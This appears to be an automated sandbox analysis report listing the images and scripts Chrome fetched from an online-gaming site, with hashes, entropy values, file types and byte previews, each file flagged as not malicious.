                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE..3..6..;..:%.6..2..3k.?u.CT.>1.7A.6<.6!.>..H.'X.+].UTP&#. ..>..1.............."..=.."..&..E..8..P..f..\..vr.~}.e`.MD..........................u..R..T.7$.B5............YR`VvXA.H7y2RhY=.U..L......g.B...............[...H=...4..'...-.za%.Z".d0.yD.E(.7".3..9..<!.?#.@-.>;.^u..........[.................S.................].{O.lB.]5.M..@$.4..(.........p..............u>.A......y..t.m.h.b.^.Y.I.d..^.jC....S...................................}..q..f..P..E..9..-.....................................v..i..W..F../..1..%)##63$FD.ba..............z.{u.wo.ti.nc.g[._Q.WE.LJ.<?.S].^j.lr.s..|.9.p*iV.c6..G.oHlY9VI7:1.C>:BTBVaGfoP..[..`..V..Q..M..G.zA.n6.p6.d..])zU%nM cE.Y=.L5.@).Y..h(.t:..H..P..Z..m..Q..e.Zr#*L/h.G.._..|E.\..b$.i" [22v2,q+%g..H..R..M..A../..44d....JqIDATx..ml[W..s..$N..-.6......6ie|....4.K.....U........_.k^Zu|Ac.x...2.....t.mG....I.c..$Mm.s..s......M.O._.k...>..s.u.n.tFk..g..P..*......."...........4.(BXmV*M...(.O.....H.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 204x263, components 3
                                                      Category:dropped
                                                      Size (bytes):22853
                                                      Entropy (8bit):7.973884115074719
                                                      Encrypted:false
                                                      SSDEEP:384:RRO4bWtbaUFMcT9AC/vUTK3rQQif5njkhzFWWfDNh5OKdX16drDfEWsa51QM0l+K:Xat+/89AMUTKdg5njk9Lh5OKB1ADfEWs
                                                      MD5:7AF1A6E2465455A6E6BCC6780D03E11B
                                                      SHA1:5FB613E10BC2EDC8F8F2B79142C2C48B98D47D86
                                                      SHA-256:BF5564DC4EC2BAE6F108CDDF5EBE03ED8554098BD0F47640CA572393F9025913
                                                      SHA-512:1010521B100DF979350181C366BF1579D5264B9A2EFB926C3BBE2C24B4DFBBB3D07066C4B6F13E14CEA25105427B74D07EB77F3B862CC2F2021F5A456E1564B6
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:......JFIF.............C....................................................................C..................................................................................................................................................................p.......L...........|....M&....2fr.2m..~'DP......~.....G..&."%.?..xX:#...`....~.....2.5.,&qj.Nm.lM1[......4......../Jw.....;.et.o...~5.oi......x.. ...F..>....%x..u..Q.x.......Vsh.}A.C.8.....{~\.....~.........#../.#+..$..A....>o.g.*}...............4.......o.l... .}K.y....c%..hu6.}b...:.oj.q.k.......|......W....'/.....L.8M..5(q.? 8..;........../N.Hx..!.......|...........9..t.....Q..O...O.._.}.....ang...I...#..8]..5...l.l..4........!..!..y{/.jv.K..G..=o.c.........>..:.s......E.......F..>..s.x....&.w?....]........_t...<.I..?...T..^...<r...G.............7Z.m|Tl.2U......jS..K)..f.>..o/.Sj....s.$..h?..!.(`.H..'&Q..B . ...F..tL.E..0.U.1pd...I...6g8iZ"..&2d.3`0....K.....N.....W....W9..82.z..K.T.J..g..x.Z
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):21644
                                                      Entropy (8bit):7.975441144938051
                                                      Encrypted:false
                                                      SSDEEP:384:Sz/eF8MsDcpudjYpSfyO85XHHlWyDOBzin5CCAnKL4yc4RRpBUWB+57hUZhaoxL7:vY8SGb5vAnzUpBUWB+57eZhFxLFNP3FN
                                                      MD5:FA78E1FFFA0930D59DFE369D298E08B9
                                                      SHA1:9A84E94C6725BE3A8DDEDFB4623CD04B645D04B4
                                                      SHA-256:1E19C0E8CACE8198EDFFE49CE49F5813661093ED4C95DFC9C03315EAD82585A5
                                                      SHA-512:209593EBC3D6DCE37F3958DB04DAA062957AC0712DDEBB72CB80374F336B932404DF8AF1F020A47A3F07C6583EA4A95534DD8CCA7E6236C25CE2007BADBD5FFA
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/mg/SMG_sharkPlatinum.png?ver=1720576306
                                                      Preview:.PNG........IHDR...............^.....PLTE.....A.....;..0..5.....*..6.....;..@..%..F..J.0xO....%..Q."M.-s.6}.'V.=..)b.*l. [....C..........ILO..1.J..7\.......(F..-....<s]bc..!.Bf.FJdkm._b.NS.gh......2j./Pa. /..QWZ.......Q.>...W\...osw.Z.....(.Z....../7...@..}..2......Ot.~..l..B.....=Bv2..tu.Cz>....".$y......]..$..p....6....j....+....P.....-~...478......L.!.T.._....F.......6s..E.=..Meh..'.aGB....y..D#...0.K.....+b.T.+...+uT..Pt77....W.7..,...../>W/....t.!'KD......)s.$..."-q.......:.3U............."Y..kI...`.,h.a....cY;5......o.=.W.l.17\B<A.).0..Uw..x.......2...\.b.[.........(Hv...yt.K;..d..K.C...q..,..Aj&..._e.I]...r.q..i..0j.,.u....?..(t.|YW.CK,ez.(C]...kt.cw.c..;._QNV...hbp`+.....\).$..8....~8.>#...J....O.....Rz..@...tB.+1U#~........o....qH{.w.@..e....x...2y.x...PT..Y.Q#^.fql.z...j...QGIDATx.t.n.@..p..P%.-9>.X.< ...D..5.U..ElU.(C..x.J..........[. |....E.Kb.......K..;.$K.$...".8..>N..H.uWW.......>~|..f.M]..I..$.......%....d....GP...>..<...).`,.1...../_.....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 80 x 19, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):690
                                                      Entropy (8bit):7.153945654594249
                                                      Encrypted:false
                                                      SSDEEP:12:6v/77ne32K2dfvHEj9Gx1QrW3Bil00ANCTUe1sIlUEjeSWsK5mPMgBBwy:4vK6Hkj9WQrsBih4mvmEjeFwL3wy
                                                      MD5:B30EA49A2BCC7479A195BB1FC07BD031
                                                      SHA1:A7BBE06838B85840035172FA9A8EE6BD35C1C636
                                                      SHA-256:08F3D508861FBB6E144807AF6719EA78CF9C26E3C99A1CBD12F9D83FE9F0758E
                                                      SHA-512:AC7F880C76EB7E3701046FC891BB9ACC2540548431EFF4552C3639DCC08B146F3FF973D050625EDFBBE61407C36E36F03080D7380B4CC4CECE176EA7CDFC4C3A
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...P.........0.z]...TPLTE.....................................................................................p@.....tRNS..J>&...b.s...kU....17..{.........IDAT8.... .D..DAP.w..?.HTN..../.\V%.....)....@.Z....i:N...<.v:.4..[...?]..u.[...t....../. ..d...e|...>f\..mY....3...C...Ua.rv.B...ss4..]Y.....wwe..1(%..$...2..;..m....h..[.......R..c<FQ%.Z+*8.7tm......5..).......zoA.J......K*_..\.....V..U......T.l....G...%1k9.K../.;......|....-...J....;....{%........t./@.).7M..{Mk^.....]iyUI.B.Z0..$.HI.u.CY3...m4.a.y.\......v..b{.u.;.a:z....?....X....b.f|..h.1!...i~..\..X..Q..g...Gy.8S.C#...>G...ev.Pd..{.$..Fq...2..T.B%.4.d.f4.>Z_..[.z../.....".....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 26 x 29, 4-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):420
                                                      Entropy (8bit):6.708044727238572
                                                      Encrypted:false
                                                      SSDEEP:12:6v/7PIs6xCqhpQZYw8sSEBkhELEm3DJ7k:ZsgCqC78ikhELxTJ7k
                                                      MD5:45DE127239EEB0897043E7689DE9CD13
                                                      SHA1:6C0E6B938D079CC8763917A56D1F08C8F321017F
                                                      SHA-256:78E4BE8551137B81429D75AA8E29205D23E5D154C8E17D73483A0B4B7D945B5B
                                                      SHA-512:E753E02165EE7D4D9885D46546623263150483FB943156D7F415F2DD5051C0C0F8D88D6E09144ED688568B1E63A368671F059CF3C24CB9E4945FB6A71B7F7A4A
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR.............FaaE...-PLTE..........................................GpL.q.....tRNS...At...1.Z".....V....IDAT..c.R..C.w ........`<A9.O5......T...E...A<U.....V%.B9 oaI.H...D OE....q...R.}.S.:Am...!V...-.P. .0..6A...).4..9000$3(5..x.`.2(..n....t"..R..+.g......n.<...6..Z\....%..%..l.....~.((....... ....2L..ZP.A...y.e.A..A....GNY....NW...%O0..9H..v.aa..Xp...A.H...aC.c.w.Ah.hBT....]..t.7....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65271)
                                                      Category:downloaded
                                                      Size (bytes):114405
                                                      Entropy (8bit):5.22084497915709
                                                      Encrypted:false
                                                      SSDEEP:3072:2hUcC5HqffYIdcMZOGHgZsUOUIBdID8CX:y45HqXYIdcMZOGHAsUOUIBdID8I
                                                      MD5:B8BE4EC964B15C656C05A17F822762B3
                                                      SHA1:1AFABBF1EEECC4D7DDFBB4C824696CE1AADC8D0F
                                                      SHA-256:E32B2B578B1345C05BE32292DA9016F7FF564BB3F4AEDA3C1B6B76869648FCBD
                                                      SHA-512:0ABFE93E1DAB3DB289B0EFE0F92E42F6FF14CC4E550B5BCA8D4A84FE736245FB70B39E5B86BD9AEA620E6FD73A76CE8AAED9D3A561C6208DC9108778DBA141B9
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/plugin/js/swiper.min.js?ver=1606790105
                                                      Preview:/**. * Swiper 4.1.0. * Most modern mobile touch slider and framework with hardware accelerated transitions. * http://www.idangero.us/swiper/. *. * Copyright 2014-2018 Vladimir Kharlampidi. *. * Released under the MIT License. *. * Released on: January 13, 2018. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):e.Swiper=t()}(this,function(){"use strict";var e=function(e){for(var t=0;t<e.length;t+=1)this[t]=e[t];return this.length=e.length,this};function t(t,i){var s=[],a=0;if(t&&!i&&t instanceof e)return t;if(t)if("string"==typeof t){var r,n,o=t.trim();if(o.indexOf("<")>=0&&o.indexOf(">")>=0){var l="div";for(0===o.indexOf("<li")&&(l="ul"),0===o.indexOf("<tr")&&(l="tbody"),0!==o.indexOf("<td")&&0!==o.indexOf("<th")||(l="tr"),0===o.indexOf("<tbody")&&(l="table"),0===o.indexOf("<option")&&(l="select"),(n=document.createElement(l)).innerHTML=o,a=0;a<n.childNodes.length;a+=1)s.push(n.childNodes[a])}else f
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 2 x 28, 8-bit/color RGB, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):1002
                                                      Entropy (8bit):5.857229472885001
                                                      Encrypted:false
                                                      SSDEEP:24:Gr1h4SHWwh82lYSKwN6vYw7VLIgT3XyJ3VKN6v/GqQgp:8KS2vnLiQTeJ3++tJ
                                                      MD5:00F172ED66E94F4AF82D9A0AE99BDB6E
                                                      SHA1:51651BC78E955C872778349074CC93AA18F8D8F7
                                                      SHA-256:29895677B34F551B8CFA01B36893909515BAEAC1C8F397295F256FF50D379FD4
                                                      SHA-512:1576E0020FB93F26E93A7393E34AFE27B3456E480E29B246087B4A330EFE163E36AB47B8C9CCF23F34C19941EC9221F2BCDD484535D245419E06FCDC6838932F
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/header/common/spiler.png
                                                      Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...iiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:75C8186921AAE311B4D0B41277BB2166" xmpMM:DocumentID="xmp.did:2408B638AF4911E3981BF40208535E06" xmpMM:InstanceID="xmp.iid:2408B637AF4911E3981BF40208535E06" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:ee31920c-d0c4-2c48-8b7d-90ad1e71f71f" stRef:documentID="xmp.did:75C8186921AAE311B4D0B41277BB2166"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>%.^Q....IDATx.bd.....gb...I.....(.H.^......IEND.B
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):3366
                                                      Entropy (8bit):7.873837987315415
                                                      Encrypted:false
                                                      SSDEEP:96:I8tffaxjzhYwhnys1ELD/Cv4BzLq/jJf2LY:VtffadJdyAELO2vmJMY
                                                      MD5:8205D647C9EB9E83A2DC71293B1CAAF5
                                                      SHA1:FC54F15AD82ED9A370571F8A5573C34B7A6A05D6
                                                      SHA-256:06ED5001009F4518D3D69A778E5D901AEBFE3068F29C26212FB591FBCEA7C377
                                                      SHA-512:E960EDFADE8305EFB7BA6456F752C6E6C7BD7CC9DDA4B9C6065E5274F2AB33A262DC3E4A113DCA8716390E650AF11CCC555E4C25C717C2FD740DC50B1615D542
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/91_egame_logo.png?ver=1606790110
                                                      Preview:.PNG........IHDR..............P......PLTE............................................................YY\......YY\.....................YY\.........YY\............YY\...YY\.........YY\YY\YY\......YY\YY\YY\YY\YY\.......................................YY\............................................................YY\...DE.....LtRNS.. `@0@.0@`......P...... ...p......P..p ...p@..P..`0.`..`.p.......p..........uIDATx..............................=8........m.UUUUUUU.......0.......PF........g:....N.Vy.(?o.....z.^.+.........}......D.E.?x..*......)........g.80z6z..SS$...h].sy0.... $.ln_..s.{..V....8j.[Y..3.<n..xZ^H.H.[v..S..h..6.%+c.z.Ya.......\.(.......(....4`=..V7\..*o...%.0[....&..u.j..e..E3.y[Wty.......$VH....#(...Tc..Z.......g.?U..<B.;.c$....%$w...T.c.t.w]2Q......F....v...v......3......q,....{....5}].;........C..2M.EJ3i.yHa.<..O./.n...!......"._x....e.J3]..]...\W..}.c...Z.z...E{....DQxMpK...p.)J.........z+.........fyF...G....r......w.3.....9.d..)W<U...b...r.|....._
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):26129
                                                      Entropy (8bit):7.984882668407912
                                                      Encrypted:false
                                                      SSDEEP:384:HNfG22cluZl8PUp7PjhYwb3V1pV1WpcP762DSNPBgpVO3b0BijFsasOThOv:t12o0PFYOT7opc22WpeVO3FRZ9Ov
                                                      MD5:326A5A8BB65826085454F82766B6E2FF
                                                      SHA1:3F5CFED438F8F306D62EF4C5FF22692A2466A3B3
                                                      SHA-256:780365E932E7575E4C5E4345BFB90A4909830347012E9626F2CB2BEF537EA7D1
                                                      SHA-512:7FC8493260CAEAC8BEAE298D2DAF7A0022EBA9FECF95E0F5066099C3BBDFCEBD4B4C3C7290914DADCA11327122A9A986CA3443741FA1550210A82627D46783D7
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....gAMA......a.....sRGB.........PLTE...........0....:;.............%X.CK>4....3....A5*.N.N.<......R*..B.......8.....".........UH?...?.6..M.........&....d.K.....{.......$.........Y..o......(d..t.U..r.A$.......)k.1&.!#..&..u.2+....5....s...._....;........-,....A...k......f.%......L?........\.Z.......bRR....k.....&................B.....-..........|...S.7...../.........{$.[p..C-.-.h............D....*..g...!....?.....^..}.+.y...U.......wS....F.t...h.s..+.s^+..L....W.....?...O.O....`)...D=O...Jd.B..@9.D..b....z....aN.....y..Uc....&....i..+.M.nT.x..q......c:C...<>.Q;...4.F.'a.9......d.VH...5y.X....Y].......9..E.g~.t7,"..wgoy{RizjX..42._.Eb..9.i~.D>.....zk...Tk..........U.....v;C.oo0(.p}.r...{r.5...sD|.j..\=..h..k.v...K.d.a.,..s..@.G... .IDATx...@SW..i.h.5...$pb$.@JR.L.Ec..$*8 .G.Z...%<B.PD.L..i.P.G.... ..C)..`...X.C..k}.:..v..}k..:=s...;..o...Z;{om..E..%....#..P.-....S..v*4..S..<'..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 204 x 101, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):7106
                                                      Entropy (8bit):7.960567472534941
                                                      Encrypted:false
                                                      SSDEEP:192:Jn8y/DYQmDsK7rpKUrFpCRmd4xV8nQUlL0yqADW2lR7:V8MEQtarYGwo4xuQGPlR7
                                                      MD5:E63C7AE6E7F2672F20E5DBC407D241F3
                                                      SHA1:B0234B61001B255A7B5F877FB1F2B7C53E732837
                                                      SHA-256:576B1EB003A9C1BE98CBDB10694F4073422B92A685305FE46C5274F70E78ECCC
                                                      SHA-512:634C36DDDB0236D15A612C4905CC86972C5D80018124669F01902E5B3993696B90FD3F2409B01DAA4654098260A3B8F675495BE5BAF024A7E7A0D1EF68854AF1
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR.......e.....6.......gAMA......a.....sRGB.........PLTE...###&&&$$$!!!"""%%%... ............'''(((.........))).....................***|||111ddd............{{{...........~~~...xxxFFF......qqq.........}{|777+++.........". eeeTTT......VVVggg.........aaa.........}}}~|}...!. ... ..bbb%#$.....fffhhh............kkk...555...EEE...ppp...{yz|z{...ttt...YYY...WWW,,,...HHH...NMN...............ooonnn.........///zzzgefQQQ.....CCC..................:99jjjsssUUUBBB444.........333...............:67......vvvrrr...ccc.....666www^]]\[[...RPQ......XXX```___...-,-???......SSS...<<<JJJ.}~=:;?==PPP...AAA...KKK$&%...LKL...# !....~.zxyyyyiii..............................fdeLJK$"#......&('OOO......%'&845...~z{spqC@A...igh'%&...WTU...!#"')(....{|qop.|}egf|xy"$#........tRNS.@..f....IDATx.....G..g....{fvvW..9........!.B.!.h2. .....$...80..Gp6...g...\.......;^.lP..>....a...M....W.=;..............H.m.}=..."W........l.sC..E.3n..8....3.o..24.23.....7........\wH`......y.#L.N4MC..%.MtAu9.....9.b.-
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):28355
                                                      Entropy (8bit):7.991912457271621
                                                      Encrypted:true
                                                      SSDEEP:768:q1TR5OsPOXsw7rH9YfYEGau/MI7kB+qvU/YH6Sidq:63OUqrdYzGauqBLQg
                                                      MD5:8554AF4EACA5E9E80520C0C17CDD1BAA
                                                      SHA1:12D392083EB331C0D05BFDB7E8634818C4151D1A
                                                      SHA-256:C7433DF2BD389DB5F0842F4128B108DFD11A273D0D8A004D1CA9FAB225029339
                                                      SHA-512:6CAA9E5253CDBE4D88B6DA3234D65EE20D10E70EE3D4272CC9D53047286ABF01A80E59AD5010F7D917CD41ED47CBE402A6D46653F1D3763A178FB8213EF0D4D2
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/o39k3h9o685xq.png?ver=1733369194
                                                      Preview:.PNG........IHDR...............^.....PLTE........T..]..i!.o..L%.y..B!._......-...u......................X.DtK.........s..B.&.....@AC...v4...r...-0..............................-........B.....0.k7$..RU..R?.9.3.o.;..=...f<.....b....d..........Z..f....O.f.8.D$..k._......7..Uk.MW.(....:......A...K4.B....F.....j.o..............5.....r... ..b(...._e......}.K.....E...$]!L..9I..u.(;l.,.....'..K!.W../...'x......c.6...{.QjDQ...n...Q.hk*...=.......`.c?......{.^.w..x.S...X8.s..&&.<.....m{..J.iB.*W.......>..H.. ..Ch.T%..tTh.phgX'.a..c......eCn....k.Q...m6....nd..`..Y+..R...B......Q..._......,dVu=.D....XV..-._..D.c.[.X....".....BI.....Z=Nb+.e.i.y.........d..r.<c.m.p.......=.|....}8..u..R..7..;..G&./dg.4...p.....^..z....-..gl....p..0.........2v.T..c....e...<..W_.8..............gx..k~IDATx...{ .i..?..[M..3.iv.S..E..a.jf(...YjQ.-.:.Y.KD.!.Y.....tZ$...].T:.m{..^.{..}.~.}..{.s=...t]...8.b..}1Us...N7.B;qnM..5k...[.h.)i.L..7S.u.np......i.[>.v..G../...G....'?.U.|
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):4626
                                                      Entropy (8bit):7.831077187005751
                                                      Encrypted:false
                                                      SSDEEP:96:cKDBTb4koR/nie92NMOU5aFq8K4Pw7fdEMRkI:cKDx4k4/htag13dEm
                                                      MD5:AF090217EB2AF46470D627A61CF6610F
                                                      SHA1:2FD4092C2C5089548B9DCA769263230D1581B55E
                                                      SHA-256:DF54D45449D3986AC869DEA084622FBC7E00D5ADF477651091AB8F8259586AE1
                                                      SHA-512:B10BD3B2955B5FA9827DF5F66768E910D0D16F47671CF9C2D75C89DD8EF7D5C7C48506F2E1BD7405E4DB980C6C13E76C77DB769809373E9D04EFA80EAC4344F6
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P.....5PLTE....#.#.#.#.#.#.#.#.#.#.#....#....#.#.#.#.#.#.#.#.#....#.#....#.#.#.#.#.#.#.#....#....#.#.#..........#.#.#.#.#.#.#.#..........#.#.......#....#....#.......#.#.......#.#..........#...................#..........#....#.......#.#..........#.#....#.#....6fR...etRNS.........<...B....6..j.Y.......xRM)...|o;"...qd`VH2,..%.......J-".~n....R...a.t[.B....fF..0O......'IDATx....j*A.....F.Y.8%..P.H@D0`....E$....uHL.e.7wcU}[{u...u.).i..i..i..i.vub.*..DJ..4.$g..H......A..F..........&....>.[Cs.&4a`l.2.....00F.....Q..+C.y...a... ^F..J.M.?f...P..D.......Q.C&p..*.'*t.....m...Nv.b.}.RH..+.-..x.B.tI.!..F.*).m..>I.r...n..|R..\%.z....q.T..n.^9x,.3.RZ..x...d+....\...C-ize......Z^.3..{.j..>}2.....4..d>.....a...(.EHP ./d............Eq.$.w..w$.]....b".#...a/KR.#dy..#3HA.G...;/...;...2M..K.>..y..."m~..cpkR$.........X...>)..FW.. a.].C.Bv.@G...9.LN....**...6..A..s.....@.......%.........
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):22075
                                                      Entropy (8bit):7.975819153940111
                                                      Encrypted:false
                                                      SSDEEP:384:aF0fRjPUXO6khBtFhV8gjqdYPG8tE1qrei7FHZIdpKOnqL1y8QfnVOEv6in0e3I4:j5oXO62tFElYPjZreg50dnpVu8z3I4
                                                      MD5:7D6C7E7FB4223C3D263458F834FE068F
                                                      SHA1:BA86454A9FEA485E31158BA25CEE658453733086
                                                      SHA-256:82926E342BA9C5074792422FC22DD02D7556519CD9F5E589A2636CAE55E12D86
                                                      SHA-512:1410CB9A80735B0B694EA5C1063D02CECBA4A2C5DE89691096C5D8A83595CEF3047EDFD332E05C12965486F8A19B773F0CB195112535C8E3579DC5706487D57D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/gdrbc1kqj7gr4.png?ver=1731898048
                                                      Preview:.PNG........IHDR...............^.....PLTE...............................be....im%......X[.......EG.89.RO....*,."*.g.qt..h.............Q...."Z...........z."}......(...)...........9.....*...z/x.^:..f.Ef.Y.i........l...Z...$.....1.1....o..R..,.v......H..9..)..|.L....Y...N.....u.Wl.!a.M.;.V.'...O.D..r..h.U\..C7!..........[f-~....*n.W.0a.,5. +..S..7.....=....6.....*.....Q.FC.&/..N..0....Ly....'.....3...t...a."%I.......4n..I..A.0..,......4JF.....C...........F.Z..v.........6UF-.i#M......ED2o/..x.k.M3..w........BK......}..i..D{.........yQ...g..G.H.+.........pmF...n.a@/.G..m..n..:.gB.J`8....... ...rH?....,.Z......[Z.....?p.$.......k.j1..]?.y2..Ru.J.A0.I7..>..T..CUc)U..4.(&.)..T...m.j.@../l.).]Z.Z.J.-!.l..`..H9.k.o f.F.1:..m...... ..D.....f.w.'...MfX,==k,...T.d5.j..L..20-nn..y......O=...R.IDATx.t...@.Fa...R..E.a..+5m(b9.>.+l.p$...]P +.:......y..._&.....Z...1...v...9.j.\dmJm.1.,.H.y.r.l.<..v.;..h..k..m..B......O^..<..B.yQ..w...rqh......V.#.Q..Pz.J.d.@..phD...^.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text
                                                      Category:dropped
                                                      Size (bytes):943
                                                      Entropy (8bit):5.159290523270169
                                                      Encrypted:false
                                                      SSDEEP:24:XCaLf+drP1UUxrBkmGpDK3DHPw4n1aO2jU9bmzdh:5fML1EmGhKTYyT8gYh
                                                      MD5:8769D3936DEF17EB1F19180E72BD61A1
                                                      SHA1:094B441638058E7BF0237F4C7821F294A022192E
                                                      SHA-256:B51AE264E880267268E3B793A3AB0781ADFD638FCB8C173E0AE3E48C9C1BE227
                                                      SHA-512:FA32870AEB8D83544EC2845D0843DDD2DF1AA488511D32EB29A74D2544BF24BCE713EFF35B33FB395D35B738B60C329EA4AF49A03B06E577A04563DFAFE7A1A6
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:var login_flag;.$(function(){..function playgame_modal(type, gameid,width,height){...if(type == 'try') type = 'Try';...if(login_flag || type=='Try'){....window.open('/loadGame/'+type+'/'+gameid, '?'+Math.random(), 'menubar=no,status=yes,scrollbars=yes,top=0,left=0,toolbar=no,width=' + width + ',height=' + height);....}else{....$('#login_modal_unite').modal('show')...}..}...$(document).on("click",".playgame_modal",function(){...let width =$(this).data('width') .|| $(window).width();...let height =$(this).data('height') || $(window).height();...let type .=$(this).data('type') .|| 'playgame';...if(gameid =$(this).data('gameid')){....playgame_modal(type, gameid,width,height);...}else{....throw new Error('....:gameid');...}..})..$(document).on('click', '.draw_H, .draw_V', function () {...if (!login_flag) {....$('#login_modal_unite').modal('show').....return false;...}....window.open('/prizedraw/default', '_blank');..}).})
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 24 x 434, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):2699
                                                      Entropy (8bit):7.568695421620088
                                                      Encrypted:false
                                                      SSDEEP:48:s8f4QkSQSKoQxkN+CNojwIQkkSxxWVh6pL2XH4Ys3qq5LzKmzEIUMOya4+CPvfS8:s8f4GBKol+eozxWVcuYYs315LzKIE3o7
                                                      MD5:2C79E8F412CC8DEAEA0FFCE4A86766CE
                                                      SHA1:DF14E8F8DFBA6027785DB5C067C43A034D07D2EA
                                                      SHA-256:6DAF808190B6CFB43E7A864A8C1F368796955716E06FFD2D42CCCB61751860D2
                                                      SHA-512:F43D7868F07B81295BE1668D2DA029C73665886C0E91DB5789EAC3AFAAE0FAF96930FDE60D71D78B54F3BA6DACD0F5BBAC4AD4572AEBF456B496B3F126D79BCA
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/about/nav_icon.png
                                                      Preview:.PNG........IHDR..............Y.....>PLTE......\\\\\\\\\...\\\\\\...\\\...\\\...\\\\\\\\\\\\\\\\\\\\\\\\...\\\...\\\\\\\\\\\\...............\\\\\\.........\\\\\\...\\\............\\\...\\\......\\\\\\...\\\\\\\\\...\\\......\\\\\\.........\\\\\\......\\\...............\\\.....................\\\\\\...\\\...\\\...\\\.....................\\\............\\\.........htRNS..............O@../....`.G.....p.....f.`M44...~..jj....^]UF0...9..roe'...V@&".uR7-#.{w..hI=;.OC..T.r....IDATh..XK.0..1(".......n..b...,t.eK)].&...L.&3..a..|z..In.#....;0...z..#.8}.|ha..gJ..K...\..+.R.#.e.%xeM.z........`S...........I.....H.Q...z..P...G=.DHv..s.J.6a..q.........w.....Gt..hp...$~|......#.'.1....N<B.....sT\..%.g..$...J=z..Q.$X<ottD.L..h.....Z....z.^..V.@......1..I.`......6..\ ..#..|.@P<B....B,.`.Q...*.[M8p.d.e.k../?..Ql-....'..*.|..hx.[.r.....>..5...Q>....>q....$u.M.ay.<.Yv.T..hY...~..9..l...|... 3.QA6.'..0A..W..+..,.f...g....9.^;....Z....)iU|........x...#..H.(..3S.\e......:.3...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):15785
                                                      Entropy (8bit):7.97080678124736
                                                      Encrypted:false
                                                      SSDEEP:384:cEa2MbvUjIfN/tAaRWQSlOtmSw2bBFqsURqSNEbXRD2Ap4Cefr:Za3cEfNtyOtmYFG0haj
                                                      MD5:6E46C8D2CD0CA31B59B1E52F371DC47B
                                                      SHA1:39E15B4BBAF318288AB646900DE6A89C65B10185
                                                      SHA-256:37C6D87C44B0EC224461EB2091E1DE331615829F94CF6C0535CB5AA44BDEFA68
                                                      SHA-512:92F30FFB4E1AF10E41ABA111877C246397CB76FCB736D97E4A0379492D2D53F79B46A597F22FC65BE2BC0BED1678DA821C54EE0CAC6544D081B5DB3F42F1874F
                                                      Malicious:false
